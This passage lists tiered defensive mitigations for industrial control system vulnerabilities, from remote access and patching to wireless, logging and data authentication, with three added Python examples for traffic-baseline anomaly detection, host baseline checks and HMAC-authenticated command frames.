replacement is not feasible.
Advanced
Design specifications include comprehensive security
standard references providing in-depth security coverage.
Implement virtual local area networks (VLANs), private
VLANs, intrusion prevention, intrusion detection, smart
switches, secure dial-up access, etc.
Vulnerability 2 Mitigations
Inadequately designed control system networks that lack
sufficient defense-in-depth mechanisms continued
Advanced - continued
Implement host based protection in conjunction with
network based protection.
Implement physical security of network access points,
including access control, or electronic methods for restricting
access (e.g., MAC address filtering).
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Foundational
Implement and document the organizational processes
and technical and procedural mechanisms for control of
electronic access at all electronic access points to the
electronic security perimeter(s).
Maintain complete and current maps of control system
topology. Identify and track up-to-date status for all access
points
Perform background checks or risk assessments on
employees with access to sensitive systems. Ensure vendors
and contractors have implemented similar procedures.
Develop and implement policy for managing user and
system access, including password policies.
Change all default passwords where possible.
Do not allow unauthenticated remote access to the control
system.
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Foundational - continued
Use secure communication technology when the internet is
used for sensitive communications (e.g., VPN, SSH, SSL,
IPSEC).
External connections should be controlled and secured
with an authentication method, firewall, or physical
disconnection when not in use. This secure method should be
established and monitored in accordance with the established
security policy and procedures.
Follow the NERC security guideline Securing Remote
Access to Electronic Control and Protection Systems.
Intermediate
Define levels of access based on roles or work
requirements. Assign access level and unique identifiers for
each operator. Isolate user access to compartmentalized
areas based on specific user needs. Log system access at all
levels.
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Intermediate - continued
Use multifactor authentication (e.g., two-factor, non-replayable credentials).
Implement a procedure whereby remote access to the
control systems must be enabled by appropriately authorized
personnel.
Perform regular audits of remote access methods.
Periodically perform passive network mapping and/or
conduct war dialing to find undocumented external
connections.
Implement a network-intrusion detection system to identify
malicious network traffic, scan systems for weak passwords,
and separate networks physically.
Include security access issues in contractual agreements
with vendors or contractors.
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Advanced
Design access levels into the system that restrict access to
configuration tools and operating screens as applicable.
Segregate development platforms from run-time platforms.
Use proximity based authentication technology, such as
RFID tokens.
Implement protocol intrusion detection and active response
technology.
Cautionary note:
The use of active response technology systems should be
carefully considered. The technology should be engineered for
application in a control system environment where failsafe
modes have been adequately considered for safety and
operational considerations.
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Foundational
Inventory all software and hardware used in the control
system.
Develop and implement hardware and software quality
assurance policy, including purchase, maintenance, and
retirement, particularly how sensitive information is removed
before reapplication or disposal.
Establish a robust patch-management process, including
tracking, evaluating, testing and installing applicable cyber
security patches for hardware, firmware, and software,
following the NERC security guideline Patch Management for
Control Systems.
Document and implement a process for the update of antivirus
and malware prevention signatures. The process must
address testing and installing the signatures on a periodic
basis.
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Foundational - continued
Periodically review authorization rights and access
privileges to ensure consistency with job function.
Revoke authorization rights and access privileges of users
upon termination or transfer.
Remove, disable, or rename administrator, shared and
other generic account privileges including factory default
accounts where possible.
Intermediate
Evaluate and characterize applications. Remove or
disconnect unnecessary functions.
Maintain full system backups and have procedures in place
for rapid deployment and recovery. Maintain a working test
platform and procedures for evaluation of updates prior to
system deployment.
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Intermediate continued
Work with vendors to include the ability to validate the
integrity of new code releases.
Use screening technology at network entry points to prohibit
the spread of malware.
Establish methods, processes, and procedures that
generate logs of sufficient detail to create historical audit trails
of individual user account access activity.
Advanced
Automate removal of user accounts, tied to badge systems
or human resources, upon employee termination.
Work with vendors to develop and implement a formal
software assurance process to verify proper functionality
through testing, certification, and accreditation processes.
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Advanced continued
Perform systematic vulnerability testing.
Limit user accounts with administrator or root privileges when
practical.
Limit shared accounts to the extent practicable, except when
necessary for safety or operational considerations.
Vulnerability 5 Mitigations
Use of inadequately secured wireless communication for control
Foundational
Perform periodic risk assessment of all wireless
implementations, including denial of service considerations.
Treat all wireless connections as remote access points.
Document and implement a program for managing access to
sensitive systems.
Establish a security policy on where and how wireless may
be used in the control system. For example, use of wireless for
critical control applications should be discouraged.
Implement encrypted wireless communication where
possible, e.g., WiFi Protected Access 2 (WPA2).
Use non-broadcast service set identifiers (SSIDs).
Vulnerability 5 Mitigations
Use of inadequately secured wireless communication for control
Foundational - continued
Treat all routable protocol wireless connections as non-private
communication paths.
Implement a procedure for disabling WiFi-capable equipment while
it is connected to critical networks and wireless use is not intended,
including laptops introduced into control center environments or
substations.
Intermediate
Implement 802.1x device registration.
Utilize media access control (MAC) address restrictions.
Perform wireless signal detection survey to identify the boundaries
of wireless perimeter.
Use directional antenna design when possible.
Implement technology to discover rogue wireless access points
and devices for all wireless network types.
Vulnerability 5 Mitigations
Use of inadequately secured wireless communication for
control
Advanced
For 802.11: Implement Wi-Fi Protected Access 2 (WPA2)
encryption with a RADIUS server.
Implement 802.1x device registration along with unregistered
device detection.
Encrypt network traffic over wireless networks at the
transport or application layer (e.g., TLS, IPSEC).
Conduct RF mapping of the wireless environment (e.g.,
characterize directional antenna side lobes).
Vulnerability 6 Mitigations
Use of a non-dedicated communications channel for command
and control and/or inappropriate use of control system
network bandwidth for non-control purposes
Foundational
Develop and implement a policy that addresses
applications and protocols introduced to a control system.
Minimizing non-control system traffic reduces noise,
enhancing effectiveness of security measures.
Restrict or eliminate non-critical traffic on the control
network and ensure quality of service for all control system
traffic.
Segregate functionality onto separate networks (e.g., do not
combine e-mail with control system networks).
Intermediate
Implement strong procedural or technical controls at all
access points to the control system to ensure authenticity of
the accessing party, where technically feasible.
Vulnerability 6 Mitigations
Use of a non-dedicated communications channel for command
and control and/or inappropriate use of control system
network bandwidth for non-control purposes
Intermediate - continued
Implement intrusion detection to monitor traffic. Evaluate
network traffic and control system point counts and polling
rates. Reconfigure for optimal use of existing resources.
Advanced
Implement protocol anomaly systems to enforce legitimate
traffic
Vulnerability 7 Mitigations
Insufficient application of tools to detect and report on
anomalous or inappropriate activity
Foundational
Develop and implement network and system management
capability to monitor network traffic.
Regularly audit system logs, where available.
Characterize normal traffic patterns.
Timestamp system logs for event correlation.
Preserve system logs for subsequent analysis.
Intermediate
Install anomaly detection where available.
Implement technologies to enforce legitimate traffic.
Time-synchronize system logs and sequence-of-events
recorders with GPS clocks or network time protocol (NTP).
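An added example, not from the NSTB slides, of what "characterize normal traffic patterns" (Vulnerability 7) and "evaluate network traffic and control system point counts and polling rates" (Vulnerability 6) can look like in code: build a per-conversation baseline from constructed flow records, then flag unknown peers, polling-rate deviations and conversations that have stopped. All hosts, ports, rates and timestamps are constructed sample data.

```python
from collections import defaultdict
from statistics import mean

# Constructed flow records: (timestamp_s, src_ip, dst_ip, dst_port).
# Baseline window: a master at 10.1.0.10 polls two outstations over
# Modbus/TCP (port 502) once per second for ten minutes.
BASELINE_FLOWS = [
    (t, "10.1.0.10", dst, 502)
    for t in range(0, 600)
    for dst in ("10.1.0.21", "10.1.0.22")
]

# Later capture (also constructed): polling of .21 has jumped to five per
# second, and an unknown host 10.1.0.99 briefly connects to .22 on port 23.
NEW_FLOWS = (
    [(t, "10.1.0.10", "10.1.0.21", 502) for t in range(0, 600) for _ in range(5)]
    + [(t, "10.1.0.10", "10.1.0.22", 502) for t in range(0, 600)]
    + [(t, "10.1.0.99", "10.1.0.22", 23) for t in range(100, 110)]
)


def profile(flows, window_s=60):
    """Per (src, dst, port): list of flow counts, one per time window seen."""
    counts = defaultdict(lambda: defaultdict(int))
    for ts, src, dst, port in flows:
        counts[(src, dst, port)][ts // window_s] += 1
    return {key: list(windows.values()) for key, windows in counts.items()}


def build_baseline(flows, window_s=60):
    """Characterize normal traffic: mean flows per window for each conversation."""
    return {key: mean(windows) for key, windows in profile(flows, window_s).items()}


def detect(baseline, flows, window_s=60, rate_factor=2.0):
    """Compare a capture with the baseline and return a list of alerts.

    Alert kinds: unknown-flow (peer/port never seen in the baseline),
    rate-deviation (polling rate more than rate_factor times normal) and
    missing-flow (a baseline conversation that has stopped entirely).
    """
    alerts = []
    observed = profile(flows, window_s)
    for key, windows in observed.items():
        if key not in baseline:
            alerts.append(("unknown-flow", key, max(windows)))
            continue
        rate = mean(windows)
        if rate > rate_factor * baseline[key]:
            alerts.append(("rate-deviation", key, rate))
    for key in baseline.keys() - observed.keys():
        alerts.append(("missing-flow", key, 0))
    return alerts


if __name__ == "__main__":
    for alert in detect(build_baseline(BASELINE_FLOWS), NEW_FLOWS):
        print(*alert)
```

A one-minute window and a 2x threshold are arbitrary choices; on a real control network the window should match the slowest poll cycle and the threshold the observed variance.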
Vulnerability 7 Mitigations
Insufficient application of tools to detect and report on
anomalous or inappropriate activity
Advanced
Implement tamper-resistant or tamper-proof long term
storage for all forensic data.
Introduce control system protocol signatures when they
become available.
Work with vendors to develop tools to identify inappropriate
control systems traffic.
Implement technology to conduct automatic correlation of
system logs for anomalous events.
When practical, implement self-healing systems (e.g.,
protected operating systems).
Vulnerability 7 Mitigations
Insufficient application of tools to detect and report on
anomalous or inappropriate activity
Cautionary notes:
The use of active response intrusion prevention systems
should be carefully considered. The technology should be
engineered for application in a control system environment
where failsafe modes have been adequately considered for
safety and operational considerations.
Intrusion detection will not encompass all vulnerabilities.
Vulnerability 8 Mitigations
Unauthorized or inappropriate applications or devices on
control system networks
Foundational
Develop policy that will provide guidance for allowable
applications and devices within the control system
environment.
Develop policy and procedures for change management.
Develop and implement a hardware inventory tracking
process.
Ensure sufficient security awareness training of
personnel responsible for component configuration and
maintenance.
Establish policy and procedures to implement strong
procedural or technical controls at the access points into the
control system for all devices to ensure authenticity of the
accessing party, where technically feasible.
Vulnerability 8 Mitigations
Unauthorized or inappropriate applications or devices on
control system networks
Foundational
Limit physical and electronic access to devices based
upon organizational roles.
Beware of automatic software shutdown mechanisms in
critical systems (e.g., processes that enforce software
licenses).
Intermediate
Use intrusion detection to uncover inappropriate
applications or devices.
Implement malware detection.
Develop and implement a policy regarding the use of
removable media.
Disable all unnecessary input/output ports on all devices.
Vulnerability 8 Mitigations
Unauthorized or inappropriate applications or devices on
control system networks
Advanced
Develop application baseline profile for each workstation
and server on control network. Configure intrusion detection
filters to identify and log baseline violations.
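An added example, not from the NSTB slides, of the baseline-profile check this mitigation describes: each host's profile lists the executables allowed to run (with expected hashes), the ones that must always be running, and the listening ports expected, and a reported inventory is compared against it. Hostnames, process names, hashes and ports are constructed sample data.

```python
import hashlib


def digest(contents):
    """SHA-256 of an executable's bytes; constructed stand-in for real file hashes."""
    return hashlib.sha256(contents).hexdigest()


# Constructed baseline profile for two control-network hosts.
BASELINE = {
    "hmi-01": {
        "processes": {"hmi.exe": digest(b"hmi-v3.1"), "opcsrv.exe": digest(b"opc-2.0")},
        "required": {"hmi.exe", "opcsrv.exe"},
        "ports": {4840},
    },
    "historian-01": {
        "processes": {"historian.exe": digest(b"hist-5.2")},
        "required": {"historian.exe"},
        "ports": {1433},
    },
}

# Constructed inventory snapshot as a host agent or scanner might report it.
OBSERVED = {
    "hmi-01": {
        "processes": {
            "hmi.exe": digest(b"hmi-v3.1"),
            "opcsrv.exe": digest(b"opc-2.0-modified"),   # binary no longer matches
            "vncserver.exe": digest(b"vnc"),             # not in the profile
        },
        "ports": {4840, 5900},                           # 5900 is unexpected
    },
    "historian-01": {
        "processes": {"historian.exe": digest(b"hist-5.2")},
        "ports": {1433},
    },
}


def check_host(hostname, observed, baseline=BASELINE):
    """Return baseline violations for one host as (kind, detail) tuples."""
    profile = baseline.get(hostname)
    if profile is None:
        return [("unknown-host", hostname)]
    violations = []
    for name, file_hash in observed["processes"].items():
        expected = profile["processes"].get(name)
        if expected is None:
            violations.append(("unauthorized-process", name))
        elif expected != file_hash:
            violations.append(("modified-binary", name))
    for name in sorted(profile["required"] - set(observed["processes"])):
        violations.append(("missing-process", name))
    for port in sorted(observed["ports"] - profile["ports"]):
        violations.append(("unexpected-listener", port))
    return violations


def check_all(observed=OBSERVED, baseline=BASELINE):
    """Run the check for every reporting host; hosts with no violations are omitted."""
    report = {}
    for hostname, snapshot in observed.items():
        violations = check_host(hostname, snapshot, baseline)
        if violations:
            report[hostname] = violations
    return report
```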
Vulnerability 9 Mitigations
Control systems command and control data not authenticated
Foundational
Limit connections and isolate control systems
communications and networking infrastructure.
Determine data authentication and integrity requirements.
Intermediate
Develop and implement, where possible, key management
policies and systems based on an agreed set of standards,
procedures, and secure methods for all issues (e.g., usage,
storage, revocation, logging, auditing, etc.) associated with
use of keys.
Advanced
Use control system protocols that contain appropriate
authentication and integrity attributes without affecting
performance as the technology becomes available.
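An added example, not from the NSTB slides and not any real control protocol, of the authentication and integrity attributes this mitigation asks for: each command frame carries a sequence number and an HMAC-SHA256 tag, so the receiving device rejects forged, modified and replayed frames. The frame layout, the commands and the link key are constructed; in practice the key comes from the key management policy and systems in the Intermediate mitigation.

```python
import hashlib
import hmac
import struct

TAG_LEN = 32   # HMAC-SHA256 output length in bytes
# Constructed demo key; a real deployment provisions a per-link key through
# its key management system rather than embedding one in code.
LINK_KEY = b"constructed-demo-key-do-not-reuse"


def build_frame(key, seq, command):
    """Frame = seq (uint32, big-endian) || command || HMAC-SHA256(key, seq || command).

    The tag covers the sequence number as well as the command, so a third
    party on the wire can neither alter the command nor re-number an old frame.
    """
    body = struct.pack(">I", seq) + command
    return body + hmac.new(key, body, hashlib.sha256).digest()


class Outstation:
    """Receiving device: accepts only authentic frames with increasing sequence numbers.

    The key is shared with the master, so this protects against third parties,
    not against a compromised master; a persisted or resynchronized counter is
    needed so that a restart does not reopen the replay window.
    """

    def __init__(self, key):
        self.key = key
        self.last_seq = 0      # highest sequence number accepted so far
        self.rejected = []     # (reason, raw frame) kept for the audit log

    def accept(self, frame):
        """Return the command bytes if the frame is authentic and fresh, else None."""
        if len(frame) < 4 + TAG_LEN:
            self.rejected.append(("malformed", frame))
            return None
        body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        # Constant-time comparison so the tag cannot be guessed byte by byte.
        if not hmac.compare_digest(tag, expected):
            self.rejected.append(("bad-tag", frame))
            return None
        seq = struct.unpack(">I", body[:4])[0]
        if seq <= self.last_seq:
            self.rejected.append(("replay", frame))
            return None
        self.last_seq = seq
        return body[4:]


if __name__ == "__main__":
    station = Outstation(LINK_KEY)
    good = build_frame(LINK_KEY, 1, b"SET breaker_12 OPEN")
    print(station.accept(good))           # command delivered
    print(station.accept(good))           # None: replay of the same frame
    forged = bytearray(good)
    forged[4] ^= 0xFF                     # flip one command byte
    print(station.accept(bytes(forged)))  # None: tag no longer matches
```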
Vulnerability 10 Mitigations
Inadequately managed, designed, or implemented critical
support infrastructure
Foundational
Evaluate critical support infrastructures currently in place
to determine adequacy and identify gaps.
Include critical support infrastructure functionality in
continuity of operation planning. Periodically exercise and
test recovery plans.
Adhere to regular maintenance and test procedures for
critical support infrastructure systems.
Intermediate
Establish and implement policies and procedures to
comprehensively test critical support infrastructures, and
periodically exercise test plan. Develop process for
identifying and resolving gaps that are revealed through
testing.
Vulnerability 10 Mitigations
Inadequately managed, designed, or implemented critical
support infrastructure
Advanced
Implement mitigations to address gaps as indicated by
analysis, audits, or testing to achieve acceptable levels of
reliability/redundancy.
Identify and test interdependencies between key systems
and subsystems.